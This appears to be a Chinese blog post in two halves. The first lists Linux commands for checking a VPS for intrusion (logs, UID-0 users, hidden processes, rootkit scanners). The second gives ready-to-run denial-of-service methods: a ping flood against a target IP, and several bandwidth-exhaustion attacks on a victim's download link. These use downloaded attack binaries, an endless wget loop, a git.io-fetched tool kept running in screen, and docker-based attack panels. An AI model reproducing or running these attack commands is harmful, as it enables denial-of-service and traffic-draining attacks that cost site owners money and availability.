网络攻防

技术 本文总阅读量

防护

判断自己的VPS是否被入侵过或植入了木马

有以下几个检查项目

  • 检查系统日志,看是否有异常的登录记录或错误登录尝试。您可以使用 last 命令查看系统登录日志,或者查看 /var/log/secure 文件。
  • 检查系统用户,看是否有不明的用户或者特权用户。您可以使用 cat /etc/passwd 和 cat /etc/shadow 命令查看用户列表,或者使用 awk -F: ‘$3==0 {print $1}’ /etc/passwd 命令查看 UID 为 0 的用户,或者使用 awk -F: ‘length ($2)==0 {print $1}’ /etc/shadow 命令查看空口令账户。
  • 检查系统进程,看是否有异常的进程或者隐藏进程。您可以使用 ps -ef 命令查看进程列表,或者使用 ps -ef | awk ‘ {print }’ | sort -n | uniq >1 和 ls /porc |sort -n |uniq >2 命令,然后使用 diff 1 2 命令查看隐藏进程。
  • 检查系统文件,看是否有异常的文件或者被修改的文件。您可以使用 find / -uid 0 –perm -4000 –print 命令查看特殊权限的文件,或者使用 find / -size +10000k –print 命令查看大文件,或者使用 find / -name “…” –print 命令查看不明文件,或者使用 rpm -Va 命令查看 RPM 的完整性。
  • 检查系统网络,看是否有异常的连接或者流量。您可以使用 ip link | grep PROMISC 命令查看网卡是否在混杂模式,或者使用 lsof –i 或 netstat –nap 命令查看打开的端口和连接,或者使用 arp –a 命令查看 ARP 表,或者使用 tcpdump 或 iperf 工具抓取和分析网络流量。
  • 检查系统计划任务,看是否有异常的任务或者后门。您可以使用 crontab –u root –l 命令查看 root 用户的计划任务,或者使用 cat /etc/crontab 命令查看系统的计划任务,或者使用 ls /etc/cron.* 命令查看其他的计划任务,或者使用 cat /etc/rc.d/rc.local 命令查看系统启动时执行的脚本,或者使用 ls /etc/rc.d 和 ls /etc/rc3.d 命令查看系统启动时加载的服务。
  • 检查系统服务,看是否有异常的服务或者 RPC 服务。您可以使用 chkconfig —list 命令查看系统服务,或者使用 rpcinfo -p 命令查看 RPC 服务。
  • 检查系统 rootkit,看是否有异常的内核模块或者程序。您可以使用 rkhunter -c 或 chkrootkit -q 工具检测系统 rootkit。

攻击

1.DDOS

控制大量设备(僵尸网络)

发动攻击

攻击尝试

2.使用ping命令进行网络攻击

ping -1 65500 -t IP地址

【-1 size】:发送缓冲区大小,其中size最大为65500B
【-t】:Ping 指定的主机,后面可以输入要攻击的IP地址。若要停止,键入 Ctrl+C

3.剑皇流量攻击

第一种

wget https://github.com/maintell/webBenchmark/releases/download/0.5/webBenchmark_linux_x64

chmod +x webBenchmark_linux_x64

./webBenchmark_linux_x64 -c 32 -s 对方直链

第二种
root下新建download_script.sh文件

#!/bin/bash

while true; do
    wget -q https://dinl5ujz893wp.cloudfront.net/1xiangcun.apk -O 1xiangcun.apk
    rm -f 1xiangcun.apk
done

chmod +x download_script.sh

sed -i 's/\r$//' download_script.sh

./download_script.sh

第三种

wget git.io/jh123

chmod +x jh123

./jh123 -c 100 -r 对方链接

其他步骤,安装screen后台运行

apt install screen
screen -dmS jh ./jh123 -c 100 -r 对方链接

安装vnstat看网速
运行vnstat -l
第四种:剑皇面板
剑皇过程会看见上传带宽跑很高,是因为docker0网卡的到eth0的原因,说简单点就是这是内网带宽,不会消耗服务器的上传带宽的,上传只有几十k的tcp握手流量,可以使用host模式启动docker镜像,这样就正常统计上传流量,但是会占用3000端口

host模式一键命令:

docker run -d --network host diead/jh:v0.1

docker 一键命令:

docker run -d -p 9111:3000 diead/jh:v0.1

项目:
https://github.com/ODJ0930/jianhuang
https://hub.docker.com/repository/docker/diead/jh/general
页面展示:

上一篇 2024-08-05
下一篇 2024-08-25